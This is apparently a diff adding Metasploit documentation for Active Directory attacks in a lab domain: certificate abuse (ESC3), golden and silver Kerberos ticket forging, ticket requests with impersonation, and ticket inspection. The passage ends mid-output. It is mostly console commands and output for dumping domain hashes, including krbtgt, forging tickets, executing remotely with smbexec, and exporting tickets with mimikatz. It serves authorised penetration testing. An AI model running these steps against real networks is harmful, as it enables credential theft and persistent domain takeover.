+that either contains the **Certificate Request Agent** EKU.
+
+The user must know:
+
+* A vulnerable certificate template, in this case `ESC3-Test`.
+* A target account, in this case `MSFLAB\smcintyre`.
+
+The steps are identical to ESC2. First a certificate is requested using the vulnerable template. Then it is used to
+request another certificate on behalf of the target account.
+
+#### Step 1
+The first step is to issue a certificate using the vulnerable certificate template.
+
+```
+msf6 > use auxiliary/admin/dcerpc/icpr_cert
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass Password1!
+SMBPass => Password1!
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA
+CA => msflab-DC-CA
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC3-Test
+CERT_TEMPLATE => ESC3-Test
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 192.168.159.10
+
+[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
+[*] 192.168.159.10:445 - Binding to \cert...
+[+] 192.168.159.10:445 - Bound to \cert
+[*] 192.168.159.10:445 - Requesting a certificate...
+[+] 192.168.159.10:445 - The requested certificate was issued.
+[*] 192.168.159.10:445 - Certificate UPN: aliddle@msflab.local
+[*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1106
+[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20221107154656_default_unknown_windows.ad.cs_831021.pfx
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) >
+```
+
+#### Step 2
+The second step is to run the module a second time, using the certificate template to request a certificate on behalf of
+the target user. The `CERT_TEMPLATE` option is updated to one allowing authentication such as the default `User`
+template.
+
+```
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/smcintyre/.msf4/loot/20221107154656_default_unknown_windows.ad.cs_831021.pfx
+PFX => /home/smcintyre/.msf4/loot/20221107154656_default_unknown_windows.ad.cs_831021.pfx
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF MSFLAB\\smcintyre
+ON_BEHALF_OF => MSFLAB\smcintyre
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User
+CERT_TEMPLATE => User
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 192.168.159.10
+
+[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
+[*] 192.168.159.10:445 - Binding to \cert...
+[+] 192.168.159.10:445 - Bound to \cert
+[*] 192.168.159.10:445 - Building certificate request on behalf of MSFLAB\smcintyre
+[*] 192.168.159.10:445 - Requesting a certificate...
+[+] 192.168.159.10:445 - The requested certificate was issued.
+[*] 192.168.159.10:445 - Certificate UPN: smcintyre@msflab.local
+[*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1000
+[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20221107154740_default_unknown_windows.ad.cs_567059.pfx
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) >
+```
@@ -0,0 +1,221 @@
+## Kerberos Ticket Forging (Golden/Silver tickets)
+
+The `auxiliary/admin/kerberos/forge_ticket` module allows the forging of a golden or silver ticket.
+
+## Vulnerable Application
+
+Any system leveraging kerberos as a means of authentication e.g. Active Directory, MSSQL
+
+## Actions
+
+There are two kind of actions the module can run:
+
+1. **FORGE_SILVER** - Forge a Silver ticket - forging a service ticket. [Default]
+2. **FORGE_GOLDEN** - Forge a Golden ticket - forging a ticket granting ticket.
+
+## Pre-Verification steps
+
+1. Obtain your targets DOMAIN via your favorite method: e.g.
+    `nmap <TARGET_IP>`
+2. Next retrieve the DOMAIN_SID: e.g.
+    `mimikatz # sekurlsa::logonpasswords`
+    or
+    `use auxiliary/gather/windows_secrets_dump`
+3. Finally get the NTHASH or AES key (prefer AES key if available) of the service account you wish to target: e.g.
+    `mimikatz # sekurlsa::logonpasswords` - this output contains both NTHASH and AES keys
+
+## Module usage
+
+1. Start msfconsole
+2. Do: `use auxiliary/admin/kerberos/forge_ticket`
+3. Do: `set DOMAIN DW.LOCAL`
+4. Do: `set DOMAIN_SID S-1-5-21-1755879683-3641577184-3486455962`
+5. Do: `set NTHASH 88E4D9FABAECF3DEC18DD80905521B29`
+6. Do: `set USER fake_user`
+7. Do: `set USER_RID 500`
+8. Do: `set SPN MSSqlSvc/dc1.dw.local:1433` (Option only used for silver tickets)
+9. Do: `forge_silver` to generate a silver ticket or `forge_golden` for a golden ticket
+10. Use your ticket which will have been stored as loot with your chosen target
+11. Example usage in impacket:
+    ```
+    export KRB5CCNAME=/path/to/ticket
+    python3 mssqlclient.py DW.LOCAL/fake_mysql@dc1.dw.local -k -no-pass
+    ```
+
+## Scenarios
+
+### Forge Golden ticket
+
+Golden tickets can be used for persistence in an Active Directory environment. The forged golden ticket is actually a Ticket Granting Ticket (TGT) - which can be used to request arbitrary Service tickets. This module does not connect directly to a Key Distribution Center (KDC), it instead forges its own ticket.
+
+Golden tickets can be forged using a stolen Kerberos `krbtgt` account, using a password hash in NTHASH format.
+
+For golden ticket attacks, the following information is required:
+
+1. `DOMAIN` - The domain, i.e.`adf3.local`
+2. `DOMAIN_SID` - This is the Security Identifier for the system, i.e. `S-1-5-21-1266190811-2419310613-1856291569`
+3. `NTHASH` - The NTHASH for the krbtgt account, i.e. `767400b2c71afa35a5dca216f2389cd9`
+4. `USER` - This username will be stored within the forged ticket, this must be a user that exists in Active Directory
+5. `USER_RID` - The relative identifier(RID) for users will be stored within the forged ticket, i.e. Administrator accounts have a RID of `500`
+
+One way of extracting the krbtgt account NTHASH is to run the `auxiliary/gather/windows_secrets_dump` module:
+
+```
+msf6 > use auxiliary/gather/windows_secrets_dump
+msf6 auxiliary(gather/windows_secrets_dump) > run smb://adf3.local;Administrator:p4$$w0rd@dc3.adf3.local
+[*] Running module against 192.168.123.13
+
+[*] 192.168.123.13:445 - Service RemoteRegistry is already running
+[*] 192.168.123.13:445 - Retrieving target system bootKey
+[+] 192.168.123.13:445 - bootKey: 0xa03745c7a9597f105a4df1e84a5aef04
+
+... omitted for brevity ...
+
+[*] 192.168.123.13:445 - Decrypting NL$KM
+[*] 192.168.123.13:445 - Dumping cached hashes
+No cached hashes on this system
+[*] 192.168.123.13:445 - Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
+[*] 192.168.123.13:445 - Using the DRSUAPI method to get NTDS.DIT secrets
+[*] 192.168.123.13:445 - SID enumeration progress -  0 / 24 ( 0.00%)
+[*] 192.168.123.13:445 - SID enumeration progress - 24 / 24 (  100%)
+# SID's:
+ADF3\Administrator: S-1-5-21-1266190811-2419310613-1856291569-500
+ADF3\Guest: S-1-5-21-1266190811-2419310613-1856291569-501
+ADF3\krbtgt: S-1-5-21-1266190811-2419310613-1856291569-502 <------------- Use the SID from here, the part before RID 502
+ADF3\DefaultAccount: S-1-5-21-1266190811-2419310613-1856291569-503
+ADF3\j.blogs: S-1-5-21-1266190811-2419310613-1856291569-1104
+ADF3\admin: S-1-5-21-1266190811-2419310613-1856291569-1112
+ADF3\DC3$: S-1-5-21-1266190811-2419310613-1856291569-1001
+ADF3\WIN10-DC3$: S-1-5-21-1266190811-2419310613-1856291569-1608
+ADF3\WIN11-DC3$: S-1-5-21-1266190811-2419310613-1856291569-1609
+
+... omitted for brevity ...
+
+# NTLM hashes:
+ADF3\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32ede47af254546a82b1743953cc4950:::
+ADF3\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+ADF3\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:767400b2c71afa35a5dca216f2389cd9::: <-- The krbtgt NTHASH
+```
+
+With the above information a golden ticket can be forged:
+
+```
+msf6 auxiliary(admin/kerberos/forge_ticket) > run action=FORGE_GOLDEN domain=adf3.local domain_sid=S-1-5-21-1266190811-2419310613-1856291569 nthash=767400b2c71afa35a5dca216f2389cd9 user=Administrator
+
+[+] MIT Credential Cache ticket saved on /Users/user/.msf4/loot/20220831223726_default_192.168.123.13_kerberos_ticket._550522.bin
+[*] Auxiliary module execution completed
+```
+
+This newly created golden ticket is a ticket granting ticket which can be used to generate service tickets without a username or password. Common services include WinRM, SMB, etc.
+
+Example using a golden ticket with Metasploit:
+
+Not currently currently supported.
+
+Example using a golden ticket with impacket:
+
+```
+export KRB5CCNAME=/Users/user/.msf4/loot/20220831223726_default_192.168.123.13_kerberos_ticket._550522.bin
+python3 ~/impacket/examples/smbexec.py 'adf3.local/Administrator@dc3.adf3.local' -dc-ip 192.168.123.13 -k -no-pass
+```
+
+If this is not working for you, there is a section dedicated to common errors below.
+
+### Forging Silver ticket
+
+A silver ticket is similar to a golden ticket. The user will compromise the password hash for a service or computer account to forge tickets which grant persistent access to services such as SMB/LDAP/MSSQL/etc.
+
+For silver ticket attacks the following information is required:
+
+1. `DOMAIN` - The domain, i.e.`adf3.local`
+2. `DOMAIN_SID` This is the Security Identifier for the system, i.e. `S-1-5-21-1266190811-2419310613-1856291569`
+3. `NTHASH` - The NTHASH for the service or computer account, i.e. `767400b2c71afa35a5dca216f2389cd9`
+4. `USER` - This username will be stored within the forged ticket, unlike with Golden tickets - this can be a non-existent user
+5. `USER_RID` - The relative identifier(RID) for users will be stored within the forged ticket, i.e. Administrator accounts have a RID of `500`
+6. `SPN` - The Service Principal name, i.e. `CIFS` for SMB access, or `MSSqlSvc/dc1.dw.local:1433`. Other examples can be seen by running `setspn -q */*` on the target
+
+Example Service Principal Names:
+
+| Service Type | Server Principal Name |
+|--------------|-----------------------|
+| WMI          | HOST or RPCSS         |
+| WinRM        | HOST or HTTP          |
+| SMB          | CIFS                  |
+| LDAP         | LDAP                  |
+| MSSQL        | MSSqlSvc              |
+
+One way of extracting the computer account NTHASH is to run the `auxiliary/gather/windows_secrets_dump` module:
+
+```
+msf6 > use auxiliary/gather/windows_secrets_dump
+msf6 auxiliary(gather/windows_secrets_dump) > run smb://adf3.local;Administrator:p4$$w0rd@dc3.adf3.local
+[*] Running module against 192.168.123.13
+
+[*] 192.168.123.13:445 - Service RemoteRegistry is already running
+[*] 192.168.123.13:445 - Retrieving target system bootKey
+[+] 192.168.123.13:445 - bootKey: 0xa03745c7a9597f105a4df1e84a5aef04
+
+... omitted for brevity ...
+
+[*] 192.168.123.13:445 - Decrypting NL$KM
+[*] 192.168.123.13:445 - Dumping cached hashes
+No cached hashes on this system
+[*] 192.168.123.13:445 - Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
+[*] 192.168.123.13:445 - Using the DRSUAPI method to get NTDS.DIT secrets
+[*] 192.168.123.13:445 - SID enumeration progress -  0 / 24 ( 0.00%)
+[*] 192.168.123.13:445 - SID enumeration progress - 24 / 24 (  100%)
+# SID's:
+ADF3\Administrator: S-1-5-21-1266190811-2419310613-1856291569-500
+ADF3\Guest: S-1-5-21-1266190811-2419310613-1856291569-501
+ADF3\krbtgt: S-1-5-21-1266190811-2419310613-1856291569-502
+ADF3\DefaultAccount: S-1-5-21-1266190811-2419310613-1856291569-503
+ADF3\j.blogs: S-1-5-21-1266190811-2419310613-1856291569-1104
+ADF3\admin: S-1-5-21-1266190811-2419310613-1856291569-1112
+ADF3\DC3$: S-1-5-21-1266190811-2419310613-1856291569-1001 <------------- Use the SID from the targeted computer account, the part before RID 1001
+
+... omitted for brevity ...
+
+# NTLM hashes:
+ADF3\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32ede47af254546a82b1743953cc4950:::
+ADF3\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+ADF3\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:767400b2c71afa35a5dca216f2389cd9:::
+... omitted for brevity ...
+ADF3\DC3$:1001:aad3b435b51404eeaad3b435b51404ee:fbd103200439e14d4c8adad675d5f244::: <-- The NTHASH for the targeted computer account
+```
+
+With the above information a silver ticket for SMB can be forged for the target host:
+
+```
+msf6 auxiliary(admin/kerberos/forge_ticket) > run action=FORGE_SILVER domain=adf3.local domain_sid=S-1-5-21-1266190811-2419310613-1856291569 nthash=fbd103200439e14d4c8adad675d5f244 user=Administrator spn=cifs/dc3.adf3.local
+
+[+] MIT Credential Cache ticket saved on /Users/user/.msf4/loot/20220831223726_default_192.168.123.13_kerberos_ticket._550522.bin
+[*] Auxiliary module execution completed
+```
+
+Example using a silver ticket with impacket:
+
+```
+export KRB5CCNAME=/Users/user/.msf4/loot/20220901132003_default_192.168.123.13_kerberos_ticket._554255.bin
+python3 $code/impacket/examples/smbexec.py 'adf3.local/Administrator@dc3.adf3.local' -dc-ip 192.168.123.13 -k -no-pass
+```
+
+### Common Mistakes
+
+**Invalid hostname**
+
+Use the full hostname of the machine you are targeting, not just the domain:
+
+```diff
+- python3 ~/impacket/examples/smbexec.py 'adf3.local/Administrator@adf3.local' -dc-ip 192.168.123.13 -k -no-pass
+ python3 ~/impacket/examples/smbexec.py 'adf3.local/Administrator@dc3.adf3.local' -dc-ip 192.168.123.13 -k -no-pass
+```
+
+**Invalid SPN**
+
+SPNs must be in the format `*/*`. If this is not identical to what Active Directory is configured with, it will not work.
+
+**Verbose Mode**
+
+If you `set Verbose true` you will set the module to run in a more verbose mode.
+This would be useful in cases where the ticket you are forging does not work as expected and in this case
+we print out the contents of the ticket after it's been forged similar to the `inspect_ticket` module with the key supplied.
@@ -0,0 +1,285 @@
+## Requesting tickets 
+
+The `auxiliary/admin/kerberos/get_ticket` module can be used to request TGT/TGS tickets from the KDC.
+
+The following ACTIONS are supported:
+
+- **GET_TGT**: legally request a TGT from the KDC given a password, a NT hash or
+  an encryption key. The resulting TGT will be cached.
+- **GET_TGS**: legally request a TGS from the KDC given a password, a NT hash, an
+  encryption key or a cached TGT. If the TGT is not provided, it will request
+  it the same way the "TGT action" does. The resulting TGT and the TGS will be
+  cached.
+
+## Module usage
+
+- Start `msfconsole`
+- Do: `use auxiliary/admin/kerberos/get_ticket`
+- Do: `run rhosts=<remote host> domain=<domain> username=<username> password=<password> action=GET_TGT`
+- You should see that the TGT is correctly retrieved and stored in loot as well as the klist command
+- Try with the NT hash (`NTHASH` option) and the encryption key (`AES_KEY`
+  option) instead of the password
+- Do: `run rhosts=<remote host> domain=<domain> username=<username> password=<password> action=GET_TGS spn=<SPN>`
+- You should see that the module uses the TGT in the cache and does not request a new one
+- You should see TGS is correctly retrieved and stored in the loot
+- Do: `run rhosts=<remote host> domain=<domain> username=<username> password=<password> action=GET_TGS spn=<SPN> KrbUseCachedCredentials=false`
+- You should see the module does not use the TGT in the cache and requests a new one
+- You should see both the TGT and the TGS are correctly retrieved and stored in the loot
+- Try with the NT hash (`NTHASH` option) and the encryption key (`AES_KEY` option) instead of the password
+
+## Options
+
+### CERT_FILE
+The PKCS12 (.pfx) certificate file to authenticate with. When this option is set, USERNAME and DOMAIN are optional and
+will be extracted from the certificate unless specified. Specifying a certificate causes PKINIT to be used to obtain the
+ticket. The module will provide a warning if USERNAME and DOMAIN are set but do not match any entries within the
+certificate.
+
+### CERT_PASSWORD
+The certificate file's password.
+
+### DOMAIN
+The Fully Qualified Domain Name (FQDN). Ex: mydomain.local
+
+### USERNAME
+The domain username to authenticate with.
+
+### PASSWORD
+The user's password to use.
+
+### NTHASH
+The user's NT hash in hex string to authenticate with. Not that the DC must
+support RC4 encryption.
+
+### AES_KEY
+The user's AES key to use for Kerberos authentication in hex string. Supported
+keys: 128 or 256 bits.
+
+### SPN
+The Service Principal Name, the format is `service_name/FQDN` . Ex:
+cifs/dc01.mydomain.local. This option is only used when requesting a TGS.
+
+### IMPERSONATE
+The user on whose behalf a TGS is requested (it will use S4U2Self/S4U2Proxy to
+request the ticket).
+
+### KrbUseCachedCredentials
+If set to `true`, it looks for a matching TGT in the database and, if found,
+use it for Kerberos authentication when requesting a TGS. Note that this option
+only applies to `GET_TGS` action and has no effect on the `GET_TGT` action.
+Default is `true`.
+
+## Scenarios
+
+### Requesting a TGT
+
+An example of viewing the Kerberos ticket cache, and requesting a TGT with NT hash:
+
+```
+msf6 auxiliary(admin/kerberos/get_ticket) > klist
+Kerberos Cache
+==============
+No tickets
+
+msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator nthash=<redacted> action=GET_TGT
+[*] Running module against 10.0.0.24
+
+[+] 10.0.0.24:88 - Received a valid TGT-Response
+[*] 10.0.0.24:88 - TGT MIT Credential Cache saved on /home/msfuser/.msf4/loot/20221104181416_default_10.0.0.24_mit.kerberos.cca_912121.bin
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/kerberos/get_ticket) > klist
+Kerberos Cache
+==============
+host            principal                 sname                         issued                     status  path
+----            ---------                 -----                         ------                     ------  ----
+192.168.123.13  Administrator@ADF3.LOCAL  krbtgt/ADF3.LOCAL@ADF3.LOCAL  2023-01-12 19:37:54 +0000  valid   /Users/usr/.msf4/loot/20230112193756_default_192.168.123.13_mit.kerberos.cca_131390.bin
+ 
+msf6 auxiliary(admin/kerberos/get_ticket) > hosts
+
+Hosts
+=====
+
+address          mac  name  os_name  os_flavor  os_sp  purpose  info  comments
+-------          ---  ----  -------  ---------  -----  -------  ----  --------
+10.0.0.24                   Unknown                    device
+
+msf6 auxiliary(admin/kerberos/get_ticket) > services
+Services
+========
+
+host             port  proto  name      state  info
+----             ----  -----  ----      -----  ----
+10.0.0.24        88    tcp    kerberos  open   Module: auxiliary/admin/kerberos/get_ticket, KDC for domain mylab.local
+```
+
+TGT with encryption key
+
+```
+msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator AES_KEY=<redacted> action=GET_TGT
+[*] Running module against 10.0.0.24
+
+[*] 10.0.0.24:88 - Getting TGT for Administrator@mylab.local
+[+] 10.0.0.24:88 - Received a valid TGT-Response
+[*] 10.0.0.24:88 - TGT MIT Credential Cache saved on /home/msfuser/.msf4/loot/20221104182051_default_10.0.0.24_mit.kerberos.cca_535003.bin
+[*] Auxiliary module execution completed
+```
+
+TGT with password
+
+```
+msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator password=<redacted> action=GET_TGT
+[*] Running module against 10.0.0.24
+
+[*] 10.0.0.24:88 - Getting TGT for Administrator@mylab.local
+[+] 10.0.0.24:88 - Received a valid TGT-Response
+[*] 10.0.0.24:88 - TGT MIT Credential Cache saved on /home/msfuser/.msf4/loot/20221104182219_default_10.0.0.24_mit.kerberos.cca_533360.bin
+[*] Auxiliary module execution completed
+```
+
+TGT with certificate
+
+```
+msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 cert_file=/home/msfuser/.msf4/loot/20230124155521_default_10.0.0.24_windows.ad.cs_384669.pfx action=GET_TGT
+[*] Running module against 10.0.0.24
+
+[*] 10.0.0.24:88 - Getting TGT for Administrator@mylab.local
+[+] 10.0.0.24:88 - Received a valid TGT-Response
+[*] 10.0.0.24:88 - TGT MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20230124155555_default_192.168.159.10_mit.kerberos.cca_702818.bin
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/kerberos/get_ticket) >
+```
+
+### Requesting a TGS
+
+TGS with NT hash:
+
+```
+msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator nthash=<redacted> action=GET_TGS spn=cifs/dc02.mylab.local
+[*] Running module against 10.0.0.24
+
+[+] 10.0.0.24:88 - Received a valid TGT-Response
+[*] 10.0.0.24:88 - TGT MIT Credential Cache saved on /home/msfuser/.msf4/loot/20221104182601_default_10.0.0.24_mit.kerberos.cca_760650.bin
+[+] 10.0.0.24:88 - Received a valid TGS-Response
+[*] 10.0.0.24:88 - TGS MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221104182601_default_10.0.0.24_mit.kerberos.cca_883314.bin
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/kerberos/get_ticket) > loot
+
+Loot
+====
+
+host             service  type                 name  content                   info                                                                             path
+----             -------  ----                 ----  -------                   ----                                                                             ----
+10.0.0.24                 mit.kerberos.ccache        application/octet-stream  realm: MYLAB.LOCAL, serviceName: krbtgt/mylab.local, username: administrator     /home/msfuser/.msf4/loot/20221104182601_default_10.0.0.24_mit.kerberos.cca_760650.bin
+10.0.0.24                 mit.kerberos.ccache        application/octet-stream  realm: MYLAB.LOCAL, serviceName: cifs/dc02.mylab.local, username: administrator  /home/msfuser/.msf4/loot/20221104182601_default_10.0.0.24_mit.kerberos.cca_883314.bin
+```
+
+TGS with encryption key:
+
+```
+msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator AES_KEY=<redacted> action=GET_TGS spn=cifs/dc02.mylab.local
+[*] Running module against 10.0.0.24
+
+[+] 10.0.0.24:88 - Received a valid TGT-Response
+[*] 10.0.0.24:88 - TGT MIT Credential Cache saved on /home/msfuser/.msf4/loot/20221104183040_default_10.0.0.24_mit.kerberos.cca_140502.bin
+[+] 10.0.0.24:88 - Received a valid TGS-Response
+[*] 10.0.0.24:88 - TGS MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221104183040_default_10.0.0.24_mit.kerberos.cca_500387.bin
+[*] Auxiliary module execution completed
+```
+
+TGS with password:
+
+```
+msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator password=<redacted> action=GET_TGS spn=cifs/dc02.mylab.local
+[*] Running module against 10.0.0.24
+
+[+] 10.0.0.24:88 - Received a valid TGT-Response
+[*] 10.0.0.24:88 - TGT MIT Credential Cache saved on /home/msfuser/.msf4/loot/20221104183244_default_10.0.0.24_mit.kerberos.cca_171694.bin
+[+] 10.0.0.24:88 - Received a valid TGS-Response
+[*] 10.0.0.24:88 - TGS MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221104183244_default_10.0.0.24_mit.kerberos.cca_360960.bin
+[*] Auxiliary module execution completed
+```
+
+TGS with cached TGT:
+
+```
+msf6 auxiliary(admin/kerberos/get_ticket) > loot
+
+Loot
+====
+
+host             service  type                 name  content                   info                                                                             path
+----             -------  ----                 ----  -------                   ----                                                                             ----
+10.0.0.24                 mit.kerberos.ccache        application/octet-stream  realm: MYLAB.LOCAL, serviceName: krbtgt/mylab.local, username: administrator     /home/msfuser/.msf4/loot/20221104183244_default_10.0.0.24_mit.kerberos.cca_171694.bin
+10.0.0.24                 mit.kerberos.ccache        application/octet-stream  realm: MYLAB.LOCAL, serviceName: cifs/dc02.mylab.local, username: administrator  /home/msfuser/.msf4/loot/20221104183244_default_10.0.0.24_mit.kerberos.cca_360960.bin
+
+msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator action=GET_TGS spn=cifs/dc02.mylab.local
+[*] Running module against 10.0.0.24
+
+[*] 10.0.0.24:88 - Using cached credential for krbtgt/mylab.local Administrator
+[+] 10.0.0.24:88 - Received a valid TGS-Response
+[*] 10.0.0.24:88 - TGS MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221104183346_default_10.0.0.24_mit.kerberos.cca_525186.bin
+[*] Auxiliary module execution completed
+```
+
+TGS without cached TGT:
+
+```
+msf6 auxiliary(admin/kerberos/get_ticket) > loot
+
+Loot
+====
+
+host             service  type                 name  content                   info                                                                             path
+----             -------  ----                 ----  -------                   ----                                                                             ----
+10.0.0.24                 mit.kerberos.ccache        application/octet-stream  realm: MYLAB.LOCAL, serviceName: krbtgt/mylab.local, username: administrator     /home/msfuser/.msf4/loot/20221104183244_default_10.0.0.24_mit.kerberos.cca_171694.bin
+10.0.0.24                 mit.kerberos.ccache        application/octet-stream  realm: MYLAB.LOCAL, serviceName: cifs/dc02.mylab.local, username: administrator  /home/msfuser/.msf4/loot/20221104183244_default_10.0.0.24_mit.kerberos.cca_360960.bin
+
+msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator action=GET_TGS spn=cifs/dc02.mylab.local KrbUseCachedCredentials=false
+[*] Running module against 10.0.0.24
+
+[-] Auxiliary aborted due to failure: unknown: Error while requesting a TGT: Kerberos Error - KDC_ERR_PREAUTH_REQUIRED (25) - Additional pre-authentication required - Check the authentication-related options (PASSWORD, NTHASH or AES_KEY)
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator action=GET_TGS spn=cifs/dc02.mylab.local KrbUseCachedCredentials=false password=<redacted>
+[*] Running module against 10.0.0.24
+
+[+] 10.0.0.24:88 - Received a valid TGT-Response
+[*] 10.0.0.24:88 - TGT MIT Credential Cache saved on /home/msfuser/.msf4/loot/20221104183538_default_10.0.0.24_mit.kerberos.cca_200958.bin
+[+] 10.0.0.24:88 - Received a valid TGS-Response
+[*] 10.0.0.24:88 - TGS MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221104183538_default_10.0.0.24_mit.kerberos.cca_849639.bin
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/kerberos/get_ticket) > loot
+
+Loot
+====
+
+host             service  type                 name  content                   info                                                                             path
+----             -------  ----                 ----  -------                   ----                                                                             ----
+10.0.0.24                 mit.kerberos.ccache        application/octet-stream  realm: MYLAB.LOCAL, serviceName: krbtgt/mylab.local, username: administrator     /home/msfuser/.msf4/loot/20221104183244_default_10.0.0.24_mit.kerberos.cca_171694.bin
+10.0.0.24                 mit.kerberos.ccache        application/octet-stream  realm: MYLAB.LOCAL, serviceName: cifs/dc02.mylab.local, username: administrator  /home/msfuser/.msf4/loot/20221104183244_default_10.0.0.24_mit.kerberos.cca_360960.bin
+10.0.0.24                 mit.kerberos.ccache        application/octet-stream  realm: MYLAB.LOCAL, serviceName: krbtgt/mylab.local, username: administrator     /home/msfuser/.msf4/loot/20221104183538_default_10.0.0.24_mit.kerberos.cca_200958.bin
+10.0.0.24                 mit.kerberos.ccache        application/octet-stream  realm: MYLAB.LOCAL, serviceName: cifs/dc02.mylab.local, username: administrator  /home/msfuser/.msf4/loot/20221104183538_default_10.0.0.24_mit.kerberos.cca_849639.bin
+```
+
+TGS impersonating the Administrator account:
+
+```
+msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=serviceA password=123456 action=GET_TGS spn=cifs/dc02.mylab.local impersonate=Administrator
+[*] Running module against 10.0.0.24
+
+[*] 10.0.0.24:88 - Getting TGS impersonating Administrator@mylab.local (SPN: cifs/dc02.mylab.local)
+[+] 10.0.0.24:88 - Received a valid TGT-Response
+[*] 10.0.0.24:88 - TGT MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_667626.bin
+[+] 10.0.0.24:88 - Received a valid TGS-Response
+[+] 10.0.0.24:88 - Received a valid TGS-Response
+[*] 10.0.0.24:88 - TGS MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_757041.bin
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/kerberos/get_ticket) > loot
+
+Loot
+====
+
+host             service  type                 name  content                   info                                                                             path
+----             -------  ----                 ----  -------                   ----                                                                             ----
+10.0.0.24                 mit.kerberos.ccache        application/octet-stream  realm: MYLAB.LOCAL, serviceName: krbtgt/mylab.local, username: servicea          /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_667626.bin
+10.0.0.24                 mit.kerberos.ccache        application/octet-stream  realm: MYLAB.LOCAL, serviceName: cifs/dc02.mylab.local, username: administrator  /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_757041.bin
+```
@@ -0,0 +1,222 @@
+## Inspecting Kerberos Tickets
+
+The `auxiliary/admin/kerberos/inspect_ticket` module allows you to print the contents of a ccache/kirbi file.
+The module will output ticket information such as:
+
+- Client information
+- Service information
+- Ticket creation / expiry times
+- Decrypted ticket contents - if `NTHASH` or `AESKEY` is set
+
+## Acquiring tickets
+
+Kerberos tickets can be acquired from multiple sources. For instance:
+
+- Retrieved directly from the KDC with the `get_ticket` module
+- Forged using the `forge_ticket` module after compromising the krbtgt or a service account's encryption keys
+- Extracted from memory using Meterpreter and mimikatz:
+
+```
+meterpreter > load kiwi
+Loading extension kiwi...
+  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
+ .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
+ ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
+ ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
+ '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
+  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
+
+Success.
+
+meterpreter > kiwi_cmd "sekurlsa::tickets /export"
+
+Authentication Id : 0 ; 1393218 (00000000:00154242)
+Session           : Network from 0
+User Name         : DC3$
+Domain            : DEMO
+Logon Server      : (null)
+Logon Time        : 1/12/2023 9:11:00 PM
+SID               : S-1-5-18
+
+	 * Username : DC3$
+	 * Domain   : DEMO.LOCAL
+	 * Password : (null)
+
+	Group 0 - Ticket Granting Service
+
+	Group 1 - Client Ticket ?
+	 [00000000]
